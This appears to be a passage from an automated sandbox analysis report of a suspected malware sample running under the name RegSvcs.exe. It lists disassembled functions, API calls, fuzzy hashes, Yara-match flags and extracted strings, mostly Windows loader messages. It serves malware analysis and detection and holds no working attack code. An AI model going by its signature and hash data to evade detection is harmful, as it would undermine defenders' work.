                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 3e4e401a284f25b08fda22d30eec023597309844017a4c1676e5bee7153c5dab
                                                                                                                              • Instruction ID: 7038de5d07d35ba1d443c00ace0aea00fd1b9678c014def232d6b5cff68c8377
                                                                                                                              • Opcode Fuzzy Hash: 3e4e401a284f25b08fda22d30eec023597309844017a4c1676e5bee7153c5dab
                                                                                                                              • Instruction Fuzzy Hash: 2E90023120148902D1107158884478A000997E4301F59C412A4425659DC7A589917631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: d958bfab99561d7f877a87a2f5ac80985c95e08c9043c565629f8e8da83b79c2
                                                                                                                              • Instruction ID: 8f2177f3cb88557ca8ee605ed5f4a45cbb9dbd714cc566bdece1594410aa0a2d
                                                                                                                              • Opcode Fuzzy Hash: d958bfab99561d7f877a87a2f5ac80985c95e08c9043c565629f8e8da83b79c2
                                                                                                                              • Instruction Fuzzy Hash: 5C90023160550502D10071584954746100997E4201F65C412A0425569DC7A58A516AB2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00413CAB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 36 413cab-413caf 37 413cb6 36->37 38 413cf7-413d20 37->38 39 413cb7-413cca 37->39 41 413d22-413d34 38->41 42 413d94-413dd1 call 417553 call 404793 call 423f93 38->42 39->37 40 413ccc-413cd1 39->40 43 413cd3-413cf6 40->43 44 413c99-413caa 40->44 45 413d36-413d46 41->45 54 413df3-413df8 42->54 55 413dd3-413de4 PostThreadMessageW 42->55 43->38 45->45 48 413d48-413d5a 45->48 55->54 56 413de6-413df0 55->56 56->54
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2N-F32-85$2N-F32-85
                                                                                                                              • API String ID: 0-2434227226
                                                                                                                              • Opcode ID: 70b582366e06f5ac0427dc3d49c4097590755790c9ba1650b4abd29055ee6f03
                                                                                                                              • Instruction ID: f1721900d1cac439e6491718fb3989da3defb19ea5ac9418864da7d87b076800
                                                                                                                              • Opcode Fuzzy Hash: 70b582366e06f5ac0427dc3d49c4097590755790c9ba1650b4abd29055ee6f03
                                                                                                                              • Instruction Fuzzy Hash: 0E31FE75804244AACB21DF759C81BDA7F39DF52720F18418EFA905F293E6684A47C3D8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00413D5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(2N-F32-85,00000111,00000000,00000000), ref: 00413DE0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 2N-F32-85$2N-F32-85
                                                                                                                              • API String ID: 1836367815-2434227226
                                                                                                                              • Opcode ID: 8449736c34331a178468b52559db49dd57b402b6278abd2c4cef92207061087b
                                                                                                                              • Instruction ID: 5ce9a90caf17c81275cd52158531782d6993ed42ec36a50565c332d43d568a81
                                                                                                                              • Opcode Fuzzy Hash: 8449736c34331a178468b52559db49dd57b402b6278abd2c4cef92207061087b
                                                                                                                              • Instruction Fuzzy Hash: A3110871E40218BADB21AB95DC47FDF7F3C9F41718F01806AFA047B180D6B857068BA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00413D63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 72 413d63-413d73 73 413d7c-413dd1 call 42ae93 call 417553 call 404793 call 423f93 72->73 74 413d77 call 42a483 72->74 84 413df3-413df8 73->84 85 413dd3-413de4 PostThreadMessageW 73->85 74->73 85->84 86 413de6-413df0 85->86 86->84
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(2N-F32-85,00000111,00000000,00000000), ref: 00413DE0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 2N-F32-85$2N-F32-85
                                                                                                                              • API String ID: 1836367815-2434227226
                                                                                                                              • Opcode ID: 57165af586907a76e0bd6a60545070ed092d343e8dc6a5dad97ba6c1308409c2
                                                                                                                              • Instruction ID: f7654e16b3fe1c6e1a408714e02349b22fc4c5201813e521ec0e73188af751ea
                                                                                                                              • Opcode Fuzzy Hash: 57165af586907a76e0bd6a60545070ed092d343e8dc6a5dad97ba6c1308409c2
                                                                                                                              • Instruction Fuzzy Hash: D601C871D4031876DB11A695DC06FDF7B7C9F41B58F01405AFA047B181D6B8570687A9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004288E3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 123 4288e3-428927 call 404823 call 4295c3 RtlFreeHeap
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(2$A,?,?,?,00000000,2$A,?,00412432,?,?), ref: 00428922
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID: 2$A
                                                                                                                              • API String ID: 3298025750-681408588
                                                                                                                              • Opcode ID: 973832adfc58f53b01a8be7ba7dbe50df262dfa26736ccdf8cacf5f7a2515294
                                                                                                                              • Instruction ID: ed1a1d2cffaaa18b12bffbdfafbf630d5e2ce3b3783f1b25fc8857758a2bbd74
                                                                                                                              • Opcode Fuzzy Hash: 973832adfc58f53b01a8be7ba7dbe50df262dfa26736ccdf8cacf5f7a2515294
                                                                                                                              • Instruction Fuzzy Hash: 48E06D762003057BDA10EE99DC42EEB33ACDFC9710F004429F908A7242CA70B9108BB9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00428893 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(00419B70,?,?,00419B70,?,?,?,00419B70,?,00002000), ref: 004288D2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              • Opcode ID: e1c311fbd65a32222058b270af25a25db7b17eb137dc85a2ea9762b5d7bcab8f
                                                                                                                              • Instruction ID: 74d18c6441f02a6b5fc4ea50800c46b86d540a26c86334ed89f428c0025ac491
                                                                                                                              • Opcode Fuzzy Hash: e1c311fbd65a32222058b270af25a25db7b17eb137dc85a2ea9762b5d7bcab8f
                                                                                                                              • Instruction Fuzzy Hash: 6BE0ED762043547FDA14EE99EC45E9B77ACDFC9710F40441AF908A7241D674BA108BB9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00428933 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ExitProcess.KERNEL32(?,00000000,?,?,B4CE4B00,?,?,B4CE4B00), ref: 00428967
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 621844428-0
                                                                                                                              • Opcode ID: 9d9498ac091c91fc8c2829dc40f22e2eb18ed8be60a8b6a5e13f430db898aff8
                                                                                                                              • Instruction ID: 6fbb90af8041c875e02e8ae7d7cadf9cbae14f77a8819c93d427ffa683cdbbc3
                                                                                                                              • Opcode Fuzzy Hash: 9d9498ac091c91fc8c2829dc40f22e2eb18ed8be60a8b6a5e13f430db898aff8
                                                                                                                              • Instruction Fuzzy Hash: 0EE04F362002147BD510EA5ADC02FDB775CDFC9B10F40441AFA08A7242C675B91086F8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 26719528c64f74ac66b23b91eabb190e336e432802ab8b9d9f89ace581b62e12
                                                                                                                              • Instruction ID: 22af48bf46fb03ab5a668b10df79b43696c230413563148f3e9e22886e6d5745
                                                                                                                              • Opcode Fuzzy Hash: 26719528c64f74ac66b23b91eabb190e336e432802ab8b9d9f89ace581b62e12
                                                                                                                              • Instruction Fuzzy Hash: B4B09B719025C5C5DA11E7644A08B17790477E0701F56C063D3031653F4778C1D1F675
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 014E2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2160512332
                                                                                                                              • Opcode ID: 8efb48efce4517b008cc7599976e4dbb8e30dc932edcc46f6836b70a019928f0
                                                                                                                              • Instruction ID: 89520a9613e3aae18be89339040586f9481edf069c5c6a92bf5409d6175170bf
                                                                                                                              • Opcode Fuzzy Hash: 8efb48efce4517b008cc7599976e4dbb8e30dc932edcc46f6836b70a019928f0
                                                                                                                              • Instruction Fuzzy Hash: 5C928E71604342AFE721CF29C848F6BBBE8BB94751F04491EFA94D7261D7B0E845CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01498620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • Critical section address, xrefs: 014D5425, 014D54BC, 014D5534
                                                                                                                              • Thread identifier, xrefs: 014D553A
                                                                                                                              • Critical section debug info address, xrefs: 014D541F, 014D552E
                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014D54E2
                                                                                                                              • undeleted critical section in freed memory, xrefs: 014D542B
                                                                                                                              • double initialized or corrupted critical section, xrefs: 014D5508
                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014D54CE
                                                                                                                              • Address of the debug info found in the active list., xrefs: 014D54AE, 014D54FA
                                                                                                                              • 8, xrefs: 014D52E3
                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014D540A, 014D5496, 014D5519
                                                                                                                              • Critical section address., xrefs: 014D5502
                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 014D5543
                                                                                                                              • Invalid debug info address of this critical section, xrefs: 014D54B6
                                                                                                                              • corrupted critical section, xrefs: 014D54C2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                              • API String ID: 0-2368682639
                                                                                                                              • Opcode ID: 115004b3040912dafb7b1c61d67e1a4c5c555217e532062016a86c7679397381
                                                                                                                              • Instruction ID: bd02bfff3db6cdae4ed01297a7301b92892655a507b5c1389871c4e775607ce4
                                                                                                                              • Opcode Fuzzy Hash: 115004b3040912dafb7b1c61d67e1a4c5c555217e532062016a86c7679397381
                                                                                                                              • Instruction Fuzzy Hash: 2081AD70A40359EFEF20CF9AC854BAEBBB5BB08714F20411BF509BB261D771A945CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014929F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 014D2506
                                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 014D2602
                                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014D24C0
                                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 014D2409
                                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 014D261F
                                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014D25EB
                                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 014D2624
                                                                                                                              • @, xrefs: 014D259B
                                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 014D2412
                                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 014D2498
                                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014D22E4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                              • API String ID: 0-4009184096
                                                                                                                              • Opcode ID: 72c71ebb9a54348f2aa933839fe30f89d64a518e7faebacaa96858583944f886
                                                                                                                              • Instruction ID: 12784437a4f9f6522e4506de17257365160f12ab263cc6a1169a2f4e849499f4
                                                                                                                              • Opcode Fuzzy Hash: 72c71ebb9a54348f2aa933839fe30f89d64a518e7faebacaa96858583944f886
                                                                                                                              • Instruction Fuzzy Hash: 3F0260B1D00229ABDF21DF54CC90FDAB7B8AB54314F4041EBE609A7261DBB09E85CF59
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01508B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                                                                                              • API String ID: 0-2515994595
                                                                                                                              • Opcode ID: c936072f5d3f84fc342779e0fa2ba4caacd6e63af0d806d882d6bd04d799d405
                                                                                                                              • Instruction ID: 0d6e547467aa51dead8811ca23acb09d819a4ef4226561d45e13a250954044eb
                                                                                                                              • Opcode Fuzzy Hash: c936072f5d3f84fc342779e0fa2ba4caacd6e63af0d806d882d6bd04d799d405
                                                                                                                              • Instruction Fuzzy Hash: D551C4B19043059BD72ACF59C844FABBBE8FFD8354F184A1EE9958B190E770D604C792
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01510274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                              • API String ID: 0-1700792311
                                                                                                                              • Opcode ID: 2dc1ab5d0f50b54b4289e7dc1b1a1d2829a37c842a6f210940cfeb06b8f0143b
                                                                                                                              • Instruction ID: c993927b17c5b02068899127923d6a8de6965b621a37f742a1b0f436f09c725f
                                                                                                                              • Opcode Fuzzy Hash: 2dc1ab5d0f50b54b4289e7dc1b1a1d2829a37c842a6f210940cfeb06b8f0143b
                                                                                                                              • Instruction Fuzzy Hash: 44D1FC31600686DFEB22DF69C450AADBBF2FF5A700F19845AF8459F2A6D73499C1CB10
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • VerifierFlags, xrefs: 014E8C50
                                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 014E8A67
                                                                                                                              • HandleTraces, xrefs: 014E8C8F
                                                                                                                              • VerifierDlls, xrefs: 014E8CBD
                                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 014E8A3D
                                                                                                                              • VerifierDebug, xrefs: 014E8CA5
                                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 014E8B8F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                              • API String ID: 0-3223716464
                                                                                                                              • Opcode ID: 1920ab8cc5a746163dff4354ce73f7a2527c53b9c46f6b9e676d6175aec90850
                                                                                                                              • Instruction ID: 284651b9061e4ba4300465ee5ce0c88d1c2e4b8cf113bcbe9012228a74830b2d
                                                                                                                              • Opcode Fuzzy Hash: 1920ab8cc5a746163dff4354ce73f7a2527c53b9c46f6b9e676d6175aec90850
                                                                                                                              • Instruction Fuzzy Hash: 0E912271640703EFDF21DF29D898B1B7BE5AB64A15F46081FFA406F2B1D770A8098B91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0146EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                              • API String ID: 0-1109411897
                                                                                                                              • Opcode ID: 797e29047459c649c997df32b8e6243605a4ac6f56dba2f7020c259b85e78069
                                                                                                                              • Instruction ID: 44758a2cdd4442f381e8cf3fb5d4726dc0826e6588b434c2e761861f6a95319d
                                                                                                                              • Opcode Fuzzy Hash: 797e29047459c649c997df32b8e6243605a4ac6f56dba2f7020c259b85e78069
                                                                                                                              • Instruction Fuzzy Hash: B4A27E78A056298FDB64CF18CDA87AABBB5AF45704F1441EED90DA7360DB309E85CF01
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014963FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-792281065
                                                                                                                              • Opcode ID: 072ba2d22a9344e8bfdba9c3bdc45fdfdfcd6faa9534e76afe6fce3c65ccb06a
                                                                                                                              • Instruction ID: a4fdc36db824533fa81480b9a1583208d15621715db1e25068b2e57d71c26deb
                                                                                                                              • Opcode Fuzzy Hash: 072ba2d22a9344e8bfdba9c3bdc45fdfdfcd6faa9534e76afe6fce3c65ccb06a
                                                                                                                              • Instruction Fuzzy Hash: A9914930A003169BEF25DF59D868BAE7FA1BB50B64F16012FE5106F7B1D7B05801C795
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrpInitShimEngine, xrefs: 014B99F4, 014B9A07, 014B9A30
                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 014B9A2A
                                                                                                                              • apphelp.dll, xrefs: 01456496
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 014B9A11, 014B9A3A
                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 014B9A01
                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014B99ED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-204845295
                                                                                                                              • Opcode ID: 0d8aa814ca586a1ab5260eee5e7b938559c850d0bba329344bc583b0a1940291
                                                                                                                              • Instruction ID: 0100399d72672e176ea74599be6a793cb05c4e856c19982b41112dad1ac478be
                                                                                                                              • Opcode Fuzzy Hash: 0d8aa814ca586a1ab5260eee5e7b938559c850d0bba329344bc583b0a1940291
                                                                                                                              • Instruction Fuzzy Hash: 8651F3712183059FE720DF25D891A9B7BE4FB98748F41051FFA559B271D630E904CBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01492674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 014D2165
                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 014D2160, 014D219A, 014D21BA
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014D21BF
